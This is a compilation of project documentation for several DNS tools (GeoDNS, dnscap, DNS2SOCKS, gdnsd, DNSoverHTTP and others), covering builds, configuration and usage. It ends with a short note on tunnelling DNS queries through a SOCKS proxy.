The underlying platform must use an ASCII encoding of characters. This means that dnsjava will not work on OS/390, for example.

Additional documentation

Javadoc documentation can be built with mvn javadoc:javadoc or viewed online at javadoc.io. See the examples for some basic usage information.

Crowbar Documentation

This is not the documentation you are looking for... it is a pointer to the real documentation.

Looking for Crowbar Resources?

The Crowbar website has links to all information and is our recommended starting place.

Specific Crowbar Documentation

We track Crowbar documentation alongside the code so that documentation versions stay matched to the code versions.
Here are commonly requested references:
You may need to look in subdirectories under the links above for additional details.

from https://github.com/crowbar/crowbar
----

CROWBAR

Transform your bare-metal into an OpenStack Cloud in hours. 
Support for CEPH, High Availability,

from https://crowbar.github.io/

DNS resolution server program: GeoDNS server



This is the DNS server powering the NTP Pool system and other similar services.

Questions or suggestions?

For bug reports or feature requests, please create an issue. For questions or discussion, you can post to the GeoDNS category on the NTP Pool forum.

Installation

If you already have go installed, just run go get to install the Go dependencies. GeoDNS requires Go 1.9 or later.
If you don't have Go installed the easiest way to build geodns from source is to download Go from https://golang.org/dl/ and untar it in /usr/local/go, and then run the following from a regular user account:
export PATH=$PATH:/usr/local/go/bin
export GOPATH=~/go
go get github.com/abh/geodns
cd ~/go/src/github.com/abh/geodns
go test
go build
./geodns -h

Sample configuration

There's a sample configuration file in dns/example.com.json. This is currently derived from the test.example.com data used for unit tests and not an example of a "best practices" configuration.
For testing there's also a bigger test file at:
mkdir -p dns
curl -o dns/test.ntppool.org.json http://tmp.askask.com/2012/08/dns/ntppool.org.json.big

Run it

After building the server you can run it with:
./geodns -log -interface 127.1 -port 5053
To test the responses run
dig -t a test.example.com @127.1 -p 5053
or
dig -t ptr 2.1.168.192.IN-ADDR.ARPA. @127.1 -p 5053
or more simply put
dig -x 192.168.1.2 @127.1 -p 5053
The binary can be moved to /usr/local/bin, /opt/geodns/ or wherever you find appropriate.

Command options

Notable command line parameters (and their defaults)
  • -config="./dns/"
Directory of zone files (and configuration named geodns.conf).
  • -checkconfig=false
Check configuration file, parse zone files and exit
  • -interface="*"
Comma separated IPs to listen on for DNS requests.
  • -port="53"
Port number for DNS requests (UDP and TCP)
  • -http=":8053"
Listen address for HTTP interface. Specify as 127.0.0.1:8053 to only listen on localhost.
  • -identifier=""
Identifier for this instance (hostname, pop name or similar).
It can also be a comma separated list of identifiers where the first is the "server id" and subsequent ones are "group names", for example region of the server, name of anycast cluster the server is part of, etc. This is used in (future) reporting/statistics features.
  • -log=false
Enable to get lots of extra logging, only useful for testing and debugging. Absolutely not recommended in production unless you get very few queries (less than 1-200/second).
  • -cpus=1
Maximum number of CPUs to use. Set to 0 to match the number of CPUs available on the system. Only "1" (the default) has been extensively tested.

WebSocket interface

geodns runs a WebSocket server on port 8053 that outputs various performance metrics. The WebSocket URL is /monitor. There's a "companion program" that can use this across a cluster to show aggregate statistics, email for more information.
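If you want to consume those metrics yourself, a client can be very small. The sketch below is just an illustration (it assumes the third-party Python websocket-client package; the port and the /monitor path are the ones documented above):
# Read a few metric messages from the geodns /monitor WebSocket (default port 8053).
# Assumes the websocket-client package: pip install websocket-client
import websocket

ws = websocket.create_connection("ws://127.0.0.1:8053/monitor")
try:
    for _ in range(5):   # print a handful of messages, then stop
        print(ws.recv())
finally:
    ws.close()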

Runtime status

There's a page with various runtime information (queries per second, queries and most frequently requested labels per zone, etc) at /status.

StatHat integration

GeoDNS can post runtime data to StatHat. (Documentation)

Country and continent lookups

See zone targeting options below.

Weighted records

Most records can have a 'weight' assigned. If any records of a particular type for a particular name have a weight, the system will return max_hosts records (default 2).
If the weight for all records is 0, all matching records will be returned. The weight can be any integer, as long as the total weight for a label and record type is less than 2 billion.
As an example, if you configure
10.0.0.1, weight 10
10.0.0.2, weight 20
10.0.0.3, weight 30
10.0.0.4, weight 40
with max_hosts 2 then .4 will be returned about 4 times more often than .1.
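To make the selection behaviour concrete, here is a minimal sketch of weight-proportional selection without replacement. It is an illustration only, written in Python (GeoDNS itself is written in Go), not the actual GeoDNS code:
# Illustrative only: pick up to max_hosts records with probability proportional
# to their weight. With the weights 10/20/30/40 above and max_hosts=2,
# 10.0.0.4 ends up in answers roughly four times as often as 10.0.0.1.
import random

def pick_hosts(records, max_hosts=2):
    """records: list of (address, weight) pairs; returns up to max_hosts addresses."""
    pool = list(records)
    picked = []
    while pool and len(picked) < max_hosts:
        total = sum(weight for _, weight in pool)
        r = random.uniform(0, total)
        for i, (addr, weight) in enumerate(pool):
            r -= weight
            if r <= 0 or i == len(pool) - 1:
                picked.append(addr)
                del pool[i]
                break
    return picked

records = [("10.0.0.1", 10), ("10.0.0.2", 20), ("10.0.0.3", 30), ("10.0.0.4", 40)]
print(pick_hosts(records))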

Configuration file

The geodns.conf file allows you to specify a specific directory for the GeoIP data files and other options. See the geodns.conf.sample file for example configuration.
The global configuration file is not reloaded at runtime.
Most of the configuration is "per zone" and done in the zone .json files. The zone configuration files are automatically reloaded when they change.

Zone format

In the zone configuration file the whole zone is a big hash (associative array). At the top level you can (optionally) set some options with the keys serial, ttl and max_hosts.
The actual zone data (dns records) is in a hash under the key "data". The keys in the hash are hostnames and the value for each hostname is yet another hash where the keys are record types (lowercase) and the values an array of records.
For example to setup an MX record at the zone apex and then have a different A record for users in Europe than anywhere else, use:
{
"serial": 1,
"data": {
"": {
"ns": [ "ns.example.net", "ns2.example.net" ],
"txt": "Example zone",
"spf": [ { "spf": "v=spf1 ~all", "weight": 1 } ],
"mx": { "mx": "mail.example.com", "preference": 10 }
},
"mail": { "a": [ ["192.168.0.1", 100], ["192.168.10.1", 50] ] },
"mail.europe": { "a": [ ["192.168.255.1", 0] ] },
"smtp": { "alias": "mail" }
}
}
The configuration files are automatically reloaded when they're updated. If a file can't be read (invalid JSON, for example) the previous configuration for that zone will be kept.
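Because a file that fails to parse is silently skipped in favour of the previous configuration, it can be worth sanity-checking a new zone file before dropping it into the zone directory. GeoDNS's own -checkconfig option (see Command options above) does this properly; the Python sketch below is purely illustrative and only checks the top-level shape described above:
# Illustrative only: check that a GeoDNS zone file is valid JSON and keeps its
# record data under a top-level "data" object, as described in "Zone format".
import json
import sys

def check_zone_file(path):
    with open(path) as f:
        zone = json.load(f)                      # raises an error on invalid JSON
    if not isinstance(zone.get("data"), dict):
        raise ValueError("missing top-level 'data' object")
    return len(zone["data"])

if __name__ == "__main__":
    print("OK: %d labels" % check_zone_file(sys.argv[1]))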

Zone options

  • serial
GeoDNS doesn't support zone transfers (AXFR), so the serial number is only used for debugging and monitoring. The default is the 'last modified' timestamp of the zone file.
  • ttl
Set the default TTL for the zone (default 120).
  • targeting
  • max_hosts
  • contact
Set the soa 'contact' field (default is "hostmaster.$domain").

Zone targeting options

  • @
  • country, continent
  • region and regiongroup

Supported record types

Each label has a hash (object/associative array) of record data, the keys are the type. The supported types and their options are listed below.
Adding support for more record types is relatively straight forward, please open a ticket in the issue tracker with what you are missing.

A

Each record has the format of a short array with the first element being the IP address and the second the weight.
[ [ "192.168.0.1", 10], ["192.168.2.1", 5] ]
See above for how the weights work.

AAAA

Same format as A records (except the record type is "aaaa").

Alias

Internally resolved cname, of sorts. Only works internally in a zone.
"foo"

CNAME

"target.example.com."
"www"
The target will have the current zone name appended if it's not a FQDN (since v2.2.0).

MX

MX records support a weight similar to A records to indicate how often the particular record should be returned.
The preference is the MX record preference returned to the client.
{ "mx": "foo.example.com" }
{ "mx": "foo.example.com", "weight": 100 }
{ "mx": "foo.example.com", "weight": 100, "preference": 10 }
weight and preference are optional.

NS

NS records for the label, use it on the top level empty label ("") to specify the nameservers for the domain.
[ "ns1.example.com", "ns2.example.com" ]
There's an alternate legacy syntax that has space for glue records (IPv4 addresses), but in GeoDNS the values in the object are ignored so the list syntax above is recommended.
{ "ns1.example.net.": null, "ns2.example.net.": null }

TXT

Simple syntax
"Some text"
Or with weights
{ "txt": "Some text", "weight": 10 }

SPF

An SPF record is semantically identical to a TXT record with the exception that the label is set to 'spf'. An example of an spf record with weights:
{ "spf": "v=spf1 ~all]", "weight": 1 }
An spf record is typically at the root of a zone, and a label can have an array of SPF records, e.g
"spf": [ { "spf": "v=spf1 ~all", "weight": 1 } , "spf": "v=spf1 10.0.0.1", "weight": 100]

SRV

An SRV record has four components: the weight, priority, port and target. The keys for these are "srv_weight", "priority", "target" and "port". Note the difference between srv_weight (the weight key for the SRV qtype) and "weight".
An example srv record definition for the _sip._tcp service:
"_sip._tcp": {
"srv": [ { "port": 5060, "srv_weight": 100, "priority": 10, "target": "sipserver.example.com."} ]
},
Much like MX records, SRV records can have multiple targets, eg:
"_http._tcp": {
"srv": [
{ "port": 80, "srv_weight": 10, "priority": 10, "target": "www.example.com."},
{ "port": 8080, "srv_weight": 10, "priority": 20, "target": "www2.example.com."}
]
},
from https://github.com/abh/geodns

Tool for capturing DNS traffic - dnscap

Network capture utility designed specifically for DNS traffic 

dnscap is a network capture utility designed specifically for DNS traffic. It produces binary data in pcap(3) and other formats. This utility is similar to tcpdump(1), but has a number of features tailored to DNS transactions and protocol options. DNS-OARC uses dnscap for DITL data collections.
Some of its features include:
  • Understands both IPv4 and IPv6
  • Captures UDP, TCP, and IP fragments.
  • Collect only queries, responses, or both (-s option)
  • Collect for only certain source/destination addresses (-a -z -A -Z options)
  • Periodically creates new pcap files (-t option)
  • Spawns an upload script after closing a pcap file (-k option)
  • Will start and stop collecting at specific times (-B -E options)
More information may be found here:
Issues should be reported here:
Mailinglist:

Dependencies

dnscap requires a couple of libraries besides a normal C compilation environment with autoconf, automake, libtool and pkgconfig.
dnscap has a non-optional dependency on the PCAP library and optional dependencies on LDNS. The BIND library libbind is considered optional, but it is needed under OpenBSD for various arpa/nameser* include headers; see Linking with libbind.
To install the dependencies under Debian/Ubuntu:
apt-get install -y libpcap-dev libldns-dev libbind-dev zlib1g-dev libyaml-perl libssl-dev
To install the dependencies under CentOS (with EPEL enabled):
yum install -y libpcap-devel ldns-devel openssl-devel bind-devel zlib-devel perl-YAML
For the following OS you will need to install some of the dependencies from source or Ports, these instructions are not included.
To install some of the dependencies under FreeBSD 10+ using pkg:
pkg install -y libpcap ldns p5-YAML openssl-devel
To install some of the dependencies under OpenBSD 5+ using pkg_add:
pkg_add libldns p5-YAML
NOTE: It is recommended to install the PCAP library from source/ports on OpenBSD since the bundled version is an older and modified version.

Dependencies for cryptopant.so plugin

For this plugin a library called cryptopANT is required; the original can be found here: https://ant.isi.edu/software/cryptopANT/index.html .
For DNS-OARC packages we build our own fork of this library, with slight modifications to conform across distributions; it is included in the same package repository as dnscap. The modifications and packaging files can be found here: https://github.com/DNS-OARC/cryptopANT .

Building from source tarball

The source tarball from DNS-OARC comes prepared with configure:
tar zxvf dnscap-version.tar.gz
cd dnscap-version
./configure [options]
make
make install

Building from Git repository

If you are building dnscap from its Git repository you will first need to initialize the Git submodules and then create the autoconf/automake files; this requires a build environment with autoconf, automake, libtool and pkg-config installed.
git clone https://github.com/DNS-OARC/dnscap.git
cd dnscap
git submodule update --init
./autogen.sh
./configure [options]
make
make install

Linking with libbind

If you plan to use dnscap's -x/-X features, then you might need to have libbind installed. These features use functions such as ns_parserr(). On some systems these functions will be found in libresolv. If not, then you might need to install libbind. I suggest first building dnscap on your system as-is, then run
$ ./dnscap -x foo
If you see an error, install libbind either from your OS package system or by downloading the source from http://ftp.isc.org/isc/libbind/6.0/ .

64-bit libraries

If you need to link against 64-bit libraries found in non-standard locations, provide the location by setting LDFLAGS before running configure:
$ env LDFLAGS=-L/usr/lib64 ./configure

OpenBSD

For OpenBSD you probably installed libpcap and libbind in /usr/local, so you will need to tell configure that; libbind might also install its libraries and header files in a subdirectory:
$ env CFLAGS="-I/usr/local/include -I/usr/local/include/bind" \
LDFLAGS="-L/usr/local/lib -L/usr/local/lib/bind" \
./configure

FreeBSD

If you've installed libbind for -x/-X then it probably went into /usr/local and you'll need to tell configure how to find it:
$ env CFLAGS="-I/usr/local/include -I/usr/local/include/bind" \
LDFLAGS="-L/usr/local/lib -L/usr/local/lib/bind" \
./configure
Also note that we have observed significant memory leaks on FreeBSD (7.2) when using -x/-X. To rectify:
  1. cd /usr/ports/dns/libbind
  2. make config
  3. de-select "Compile with thread support"
  4. reinstall the libbind port
  5. recompile and install dnscap

Plugins

dnscap comes bundled with a set of plugins, see -P option.
  • anonaes128.so: Anonymize IP addresses using AES128
  • anonmask.so: Pseudo-anonymize IP addresses by masking them
  • cryptopan.so: Anonymize IP addresses using an extension to Crypto-PAn (College of Computing, Georgia Tech) made by David Stott (Lucent)
  • cryptopant.so: Anonymize IP addresses using cryptopANT, a different implementation of Crypto-PAn made by the ANT project at USC/ISI
  • ipcrypt.so: Anonymize IP addresses using ipcrypt, created by Jean-Philippe Aumasson
  • pcapdump.so: Dump DNS into a PCAP with some filtering options
  • royparse.so: Splits a PCAP into two streams; queries in PCAP format and responses in ASCII format
  • rssm.so: Root Server Scaling Measurement plugin, see its README.md for more information
  • rzkeychange.so: RFC8145 key tag signal collection and reporting plugin
  • txtout.so: Dump DNS as one-line text
There is also a template plugin in the source repository to help others develop new plugins.

CBOR DNS Stream Format

This is an experimental format for representing DNS information in CBOR with the goals to:
  • Be able to stream the information
  • Support incomplete, broken and/or invalid DNS
  • Have close to no data quality and signature degradation
  • Support additional non-DNS meta data (such as ICMP/TCP attributes)
Read CBOR_DNS_STREAM.md for more information.
To enable this output please follow the instructions below for Enabling CBOR Output, note that this only requires Tinycbor.

Outputting to CBOR DNS Stream (CDS)

To output to the CDS format you tell dnscap to write to a file and set the format to CDS. CDS is a stream of CBOR objects and you can control how many objects are kept in memory until flushed to the file by setting cds_cbor_size, note that this is bytes of memory and not number of objects. When it reaches this limit it will write the output and start on a new file. Read dnscap's man page for all CDS extended options.
src/dnscap [...] -w <file> -F cds [ -o cds_cbor_size=<bytes> ]

CBOR

There is experimental support for CBOR output using LDNS and Tinycbor with a data structure described in the DNS-in-JSON draft.

Enabling CBOR Output

To enable the CBOR output support you will need to install its dependencies before running configure. LDNS exists for most distributions, but Tinycbor is new so you need to download and compile it; you do not necessarily need to install it, as shown in the example below.
git clone https://github.com/DNS-OARC/dnscap.git
cd dnscap
git submodule update --init
git clone https://github.com/01org/tinycbor.git
cd tinycbor
git checkout v0.4.2
make
cd ..
sh autogen.sh
CFLAGS="-I$PWD/tinycbor/src" LDFLAGS="-L$PWD/tinycbor/lib" LIBS="-ltinycbor" ./configure
make
NOTE: Paths in CFLAGS and LDFLAGS must be absolute.

CBOR to JSON

Tinycbor comes with a tool to convert CBOR to JSON, check bin/cbordump -h in the Tinycbor directory after having compiled it.

Outputting to CBOR

To output to the CBOR format you tell dnscap to write to a file and set the format to CBOR. Since Tinycbor constructs everything in memory there is a limit and when it is reached it will write the output and start on a new file. You can control the number of bytes with the extended option cbor_chunk_size.
src/dnscap [...] -w <file> -F cbor [ -o cbor_chunk_size=<bytes> ]

Additional attributes

There is currently an additional attribute added to the CBOR object which contains the IP information as follows:
"ip": [
<protocol>,
"<source ip address>",
<source port>,
"<destination ip address>",
<destination port>
]
Example:
"ip": [
17,
"127.0.0.1",
34856,
"127.0.0.1",
53
]
from https://github.com/DNS-OARC/dnscap

Tool for forwarding DNS queries via a local SOCKS proxy server - dns2socks

DNS2SOCKS is a command line utility that forwards DNS requests to a
DNS server via a SOCKS tunnel.

I know that this is no new idea, but let me explain why I've coded this:
Windows supports using a SOCKS proxy server for Internet connections, but it
only uses the SOCKS proxy server for the webpages and not for the DNS requests. I
found several articles on the Internet referring to this issue. There seem
to be tools that do exactly the same thing as DNS2SOCKS, but they either
need a scripting interpreter or are not available for downloading anymore.

So I've coded my own tool. It's very(!) simple and doesn't use any
sophisticated technology.

To use it, just configure your OS to use the DNS server on the local
IP address 127.0.0.1 (IPv4) and/or ::1 (IPv6). On Windows: open the
properties of your network adapter. For IPv4 open the properties of
"Internet Protocol Version 4 (TCP/IPv4)", select "Use the following DNS
server addresses" and enter "127.0.0.1" for the "Preferred DNS server".
For IPv6 open the properties of "Internet Protocol Version 6
(TCP/IPv6)", select "Use the following DNS server addresses" and enter
"::1" for the "Preferred DNS server".

After that run your SOCKS server (must support SOCKS protocol version 5,
for example Tor) and start DNS2SOCKS using the correct command line
switches (see below). Now all DNS requests of your OS (triggered by any
application) run through DNS2SOCKS and your SOCKS server.

You can additionally configure Windows to use your SOCKS server for
Internet connections (for the content, not DNS). To do this open the
"Internet Options" of the control panel, select the tab "Connections" and
click on "LAN settings". Check "Use a proxy server for your LAN..." and
click on "Advanced". Enter your SOCKS server address and port in the field
"Socks". Now Internet Explorer and other tools using these settings get
web pages via your SOCKS server. This works with most browsers. However,
you should rely on IPv4 for Tor here as (most?) Tor exit servers currently
don't support IPv6 (see below).

The command line call for DNS2SOCKS has the following format:

DNS2SOCKS [/?] [/d] [/q] [/l[a]:FilePath] [/u:User /p:Password]
[Socks5ServIP[:Port]] [DNSServIPorName[:Port]] [ListenIP[:Port]]

/? or any invalid parameter outputs the usage text
/d disables the cache
/q disables the text output to the console
/l:FilePath creates a new log file "FilePath"
/la:FilePath creates a new log file "FilePath" or appends to the file if
it already exists
/u:User user name if your SOCKS server uses user/password
authentication
/p:Password password if your SOCKS server uses user/password
authentication

The default values for the addresses and ports are (in case you don't
specify the command line arguments):
Default Socks5ServerIP:Port = 127.0.0.1:9050
Default DNSServerIPorName:Port = 213.73.91.35:53
Default ListenIP:Port = 127.0.0.1:53

So the SOCKS server runs locally on the TCP port 9050 (Tor's default port;
attention: for Tor Browser Bundle you must change it to 9150). The used
DNS server is 213.73.91.35 (dnscache.berlin.ccc.de). The DNS server must
support TCP on port 53 as Tor doesn't support UDP via SOCKS. DNS2SOCKS
listens on the UDP port 53 of 127.0.0.1 (only locally) - change this to
0.0.0.0 for listening on all available local IPv4 addresses.

You can launch DNS2SOCKS several times with different settings, for
example to listen on IPv6 addresses additionally. To specify an IPv6
address, use the typical format like 1234:5678::1234. To add the port
number please embed the IP address in square brackets and add the port
number separated by the colon, e.g. [::1]:1024

Hint: In the default configuration Tor only listens on 127.0.0.1 for
incoming requests. You can change this in Tor's configuration file using
the following line
SocksListenAddress 192.168.1.1
In this example it listens on 192.168.1.1
Currently Tor doesn't support IPv6 addresses for listening.

Please note that Tor/Vidalia will output warnings that your application
doesn't resolve host names via Tor. This is not true, but Tor can't know
this as Tor doesn't recognize the tunneled DNS requests. DNS2SOCKS
directly uses the IP address of the DNS server while using SOCKS and also
your application will do this as it gets the IP address from DNS2SOCKS.
Tor expects getting the host names instead of IP addresses and thus
outputs these warnings.

However, instead of an IP address you can also specify the DNS server's
name instead of its IP address, e.g.
DNS2SOCKS 127.0.0.1 dnscache.berlin.ccc.de ::1
Specifying an IPv6 address for the DNS server is also supported by
DNS2SOCKS, but it's not recommended to do this as your current Tor exit
server would need to support IPv6, which it typically doesn't. So it's
better to specify the DNS server name as the exit server can choose IPv4
or IPv6 automatically this way. Directly specifying an IPv4 address might
be a bit faster; currently all Tor exit servers should support this.

As DNS requests running through the SOCKS tunnel are very slow, the
calling application might time out before it gets the answer - in this
case just try it again (press "reload" in the browser).

The output of DNS2SOCKS is very simple. On each new request it outputs
the requested name prefixed by the current number of entries in the
cache (just an increasing number in case the cache is disabled) and a time
stamp. DNS2SOCKS caches DNS requests, so the next time it can serve the
answer faster. The cache is a very simple list. There is no sophisticated
hash algorithm or something like that for the cache and DNS2SOCKS doesn't
really interpret the DNS requests and answers - it just forwards them.

DNS2SOCKS runs as long as you don't manually stop it.
You can also run several instances of DNS2SOCKS at the same time when
using different local ports or IPv4 and IPv6 at the same time, e.g. use a
batch file and Windows' Start command to do this.

If you think that DNS2SOCKS is not the right tool for you, but you want
to route all network traffic of a specific Windows application through a
SOCKS tunnel, you might want to try my tool InjectSOCK



Now about some technical details:
DNS2SOCKS listens on the local UDP and TCP port you specify. In case it
gets a request it first searches the cache for an identical request.
In case of a cache miss or expiration of the entry, the tool creates a new
thread for resolving the request. The new thread opens a TCP connection to
the SOCKS server and forwards the DNS request. This time the DNS request
always runs on TCP as Tor currently doesn't support UDP via SOCKS. So the
DNS server must support TCP. When the thread finally gets the answer, it
forwards it via UDP or TCP to the requesting client and stores it in the
cache. DNS2SOCKS supports user/password authentication (method 0x02) for
SOCKS.
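The same mechanism is easy to reproduce for testing. The Python sketch below is not DNS2SOCKS itself, just an illustration of one length-prefixed DNS-over-TCP query sent through a SOCKS5 server; it assumes the third-party PySocks and dnspython packages, Tor's default SOCKS port 9050, and the default DNS server mentioned above:
# Illustration of DNS over TCP through a SOCKS5 tunnel (the flow described above).
# Assumes: PySocks (pip install PySocks), dnspython, a SOCKS5 server on
# 127.0.0.1:9050 and a DNS server that answers on TCP port 53.
import struct
import socks          # PySocks
import dns.message    # dnspython

query = dns.message.make_query("example.com", "A").to_wire()

s = socks.socksocket()
s.set_proxy(socks.SOCKS5, "127.0.0.1", 9050)
s.connect(("213.73.91.35", 53))                        # DNS server, TCP port 53
s.sendall(struct.pack(">H", len(query)) + query)       # DNS-over-TCP: 2-byte length prefix

(length,) = struct.unpack(">H", s.recv(2))
answer = b""
while len(answer) < length:
    answer += s.recv(length - len(answer))
s.close()

print(dns.message.from_wire(answer))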

I've tried to comment the source code as well as possible and you can
compile it using Visual C++ 2010 Express Edition (or any other edition).
I've also tested it on Knoppix and Damn Small Linux and compiled it via
gcc -pthread -Wall -O2 -o DNS2SOCKS DNS2SOCKS.c
It should also run on other *nix variants; maybe with tiny modifications.

Have fun using this software!

from https://github.com/qiuzi/dns2socks

Authoritative DNS server program - gdnsd

Authoritative DNS Server -- 

Overview

gdnsd is an Authoritative-only DNS server. The initial g stands for Geographic, as gdnsd offers a plugin system for geographic (or other sorts of) balancing, redirection, and service-state-conscious failover. The plugin system can also do things like weighted address/cname records. If you don't care about these features you can ignore them :).
gdnsd is written in C, and uses pthreads with libev and liburcu to attain very high performance, low latency service. It does not offer any form of caching or recursive service, and does not support DNSSEC. There's a strong focus on making the code efficient, lean, and resilient. The code has a decent regression testsuite with full branch coverage on the core packet parsing and generation code, and some scripted QA tools for e.g. valgrind validation, clang-analyzer, etc.
The geographically-aware features also support the EDNS Client Subnet spec from RFC 7871 for receiving more-precise network location information from intermediate shared caches.

Resources

Project site: https://gdnsd.org/
The code is hosted at Github: https://github.com/gdnsd/gdnsd/
Google Group for discussion: https://groups.google.com/forum/#!forum/gdnsd
See the INSTALL file for details on prerequisites and build procedure for working from the source tree or a source tarball.
The documentation is included in the source tree in POD format and installed as manpages and textfiles on installation.

DNSoverHTTP (includes both server and client)


Source code for a DNS over HTTP implementation.

Introduction

This is proxy_dns, a way to tunnel DNS inside HTTP. It provides two things:
  1. a FastCGI endpoint that sits between a web server (we use nginx, but Apache would also work) and a DNS server (we use BIND, but Unbound would also work.)
  2. a DNS proxy server that is the target of an /etc/resolv.conf (on UNIX) or DHCP "name server" declaration; it resolves DNS by using upstream HTTP.
The great advantage to this approach is that HTTP usually makes it through even the worst coffee shop or hotel room firewalls, since commerce may be at stake. We also benefit from HTTP's persistent TCP connection pool concept, which DNS on TCP/53 does not have. Lastly, HTTPS will work, giving nominal privacy.
This software is as yet unpackaged, but is portable to FreeBSD 10 and Debian 7 and very probably other BSD-similar and Linux-similar systems. This software is written entirely in C and has been compiled with GCC and Clang with "full warnings" enabled.

Construction

More or less, do this:
(cd proxy_dns_gw; make)
(cd proxy_dns_fcgi; make)
It is possible that the Makefile will need tweaking, since -lresolv is required on Linux but is neither required nor functional on BSD, due to differences in their "libc" implementations.

Server Installation

The proxy_dns_fcgi service currently just follows /etc/resolv.conf, so you will need a working name server configuration on your web server. The server should be reachable by UDP and TCP, and you should have a clear ICMP path to it, as well as full MTU (1500 octets or larger) and the ability to receive fragmented UDP (to make EDNS0 usable.)
  1. place the proxy_dns_fcgi executable somewhere that nginx can reach it.
  2. start this executable and look for a /tmp/proxy_dns_fcgi.sock file.
  3. edit nginx.conf to contain something equivalent to the following:
     location /proxy_dns {
    root /;
    fastcgi_pass unix:/tmp/proxy_dns_fcgi.sock;
    include fastcgi_params;
    }
    or, edit httpd.conf to contain something equivalent to the following:
     Listen 24.104.150.237:80
     Listen [2001:559:8000::B]:80

     LoadModule proxy_module libexec/apache24/mod_proxy.so
     LoadModule proxy_fcgi_module libexec/apache24/mod_proxy_fcgi.so

     <VirtualHost *:80>
         ServerName proxy-dns.tisf.net
         ProxyPass /proxy_dns \
             unix:/tmp/proxy_dns_fcgi.sock|fcgi://localhost/ \
             enablereuse=on
     </VirtualHost>

  4. reload the configuration of, or restart, your nginx server.
  5. test the integration by visiting the /proxy_dns page with a browser.

Client Installation

The proxy_dns_gw service must be told what IP address to listen on for DNS (noting, it will open both a UDP and a TCP listener on that address), so if you want it to listen on both ::1 and 127.0.0.1, you will have to start two listeners, by giving proxy_dns_gw two arguments "-l ::1" and "-l 127.0.0.1".
It must also be told where to connect for its DNS proxy service. If your FastCGI service (see previous section) is running on a web server proxy-dns.vix.su, then you will have to specify "-s http://proxy-dns.vix.su" (or "-s https://proxy-dns.vix.su" if you are using TLS to protect your HTTP.)
  1. place the proxy_dns_gw executable somewhere that will survive a reboot.
  2. start this executable at least once with appropriate "-s" and "-l" options.
  3. use "netstat -an" to determine whether it has opened listener sockets.

Testing

Make sure you have a working "dig" command. If you started your client side dns_proxy service on 127.0.0.1, then you should be able to say:
dig @127.0.0.1 www.vix.su aaaa
and get a result back. You can watch this simultaneously on the server side dns_proxy by running a command similar to this:
tail -f /var/log/nginx-access.log

Protocol

The protocol used by the dns_proxy service is alarmingly simple. There's no JSON or XML encoding; the DNS query and response are sent as raw binary via the "libcurl" library on the client side and the "libfcgi" library on the server side. The URI is always "/proxy_dns", which means, it contains no parameters. The result is always marked non-cacheable. The request is always POST. If you send the fcgi server a GET, it will return a human-readable page showing its web server environment. There is one new HTTP header:
Proxy-DNS-Transport: xyz
where xyz is either UDP or TCP, which is the client's indication of how it received the underlying DNS query, and which the server will use when sending the query to the far-end DNS server. This means if a stub DNS client asks for TCP, then that's what the far-end DNS server will see, and likewise for UDP.
The proxy service does not interpret the DNS query or response in any way. It could be DNS, EDNS, or something not yet invented at the time of this writing. The only requirement is that each request message solicits exactly one response message. If anything at all goes wrong with the proxy service, the stub client will hear a DNS SERVFAIL response.
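Because the protocol is just a raw DNS message in a POST body plus the Proxy-DNS-Transport header, a client is easy to sketch. The Python example below (assuming the third-party requests and dnspython packages; replace the URL with your own /proxy_dns endpoint) sends one query and decodes the answer:
# Minimal DNS-over-HTTP client following the protocol described above:
# raw DNS query as the POST body, Proxy-DNS-Transport header, raw DNS answer back.
import requests
import dns.message

query = dns.message.make_query("www.vix.su", "AAAA")
resp = requests.post(
    "http://proxy-dns.vix.su/proxy_dns",       # example endpoint; use your own server
    data=query.to_wire(),
    headers={"Proxy-DNS-Transport": "UDP"},    # how the stub query "arrived" at the client
)
resp.raise_for_status()
print(dns.message.from_wire(resp.content))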

To Do List

This software was written in C in order to be small, self contained, and portable to Windows and Mac/OS some day. The protocol was designed to be very simple in order that higher-performing implementations could be written for high availability production servers. Still, shortcuts were taken, and should be addressed:
  1. threads on the proxy_dns_fcgi side are a problem. should use "libevent".
  2. select() on the proxy_dns_gw side is a problem. should use "libcurl" more.

Authors

This software was conceived and drafted by Paul Vixie during WIDE-2015-03, and is hereby placed into the public domain, and also placed into the care of BII, a Beijing-based non-profit Internet technology company.
Note that there is a follow-up work using Golang to implement DNS over HTTP, Please visit https://github.com/BII-Lab/DNSoverHTTPinGO for more information.

from https://github.com/BII-Lab/DNSoverHTTP

Using the dnsproxy written by ARwMq9b6 for DNS queries really does avoid DNS poisoning

On the local Mac machine:
mkdir dnsproxy-by-ARwMq9b6
cd dnsproxy-by-ARwMq9b6
wget https://github.com/ARwMq9b6/dnsproxy/releases/download/v0.1.1/dnsproxy-v0.1.1-darwin-amd64.tar.gz
tar zxvf dnsproxy-v0.1.1-darwin-amd64.tar.gz


yudeMacBook-Air:dnsproxy-by-ARwMq9b6 brite$ ls
china_domain_list.txt    config.toml    dnsproxy-v0.1.1-darwin-amd64.tar.gz
china_ip_list.txt        dnsproxy       gfw_domain_list.txt
yudeMacBook-Air:dnsproxy-by-ARwMq9b6 brite$ cat config.toml
gfw_list = "./gfw_domain_list.txt"
china_list = "./china_domain_list.txt"
china_ip_list = "./china_ip_list.txt"

###########
# DNS server
###########
[dns]
listen = ":53"  # bind address for the local DNS server that will be started

# Domestic (China) DNS server
[dns.obedient]
nameserver = "119.29.29.29:53"  # DNS server address
net = "udp"  # allowed values: udp | tcp | tcp-tls

# Foreign DNS server
# - when enable_dns_over_https == true:
#       `nameserver` defaults to https://dns.google.com/resolve?
#       `proxy` may be an http, socks5, etc. proxy
# - when enable_dns_over_https == false:
#       `proxy` must not be an http proxy
#
# DNS queries are slower with enable_dns_over_https enabled
[dns.abroad]
enable_dns_over_https = false

nameserver = "8.8.8.8:53"  # DNS server address
proxy = "socks5://127.0.0.1:7071"

###########
# Proxy server
###########
[proxy]
listen = ":1480"  # bind address for the local proxy server that will be started

proxy_server = "socks5://127.0.0.1:7071"  # an existing http or socks5 proxy; traffic for non-mainland-China sites will be forwarded to it
proxy_server_external_ip = ""  # public IP of the proxy server
                               # optional; used to improve the quality of the proxy server's DNS lookups
                               # you can find the public IP by browsing through the proxy to a site like `https://tools.keycdn.com/geo`
yudeMacBook-Air:dnsproxy-by-ARwMq9b6 brite$ sudo ./dnsproxy -c config.toml

Password:

See the "socks5://127.0.0.1:7071" in the config.toml file? It means that a SOCKS5 proxy program running on the local machine (for example an SSH tunnel; an SSH tunnel is recommended, since its encryption is clearly stronger than Shadowsocks) is used to forward DNS requests to 8.8.8.8:53. Because the DNS requests are forwarded through an encrypted proxy, they are no longer subject to DNS poisoning.
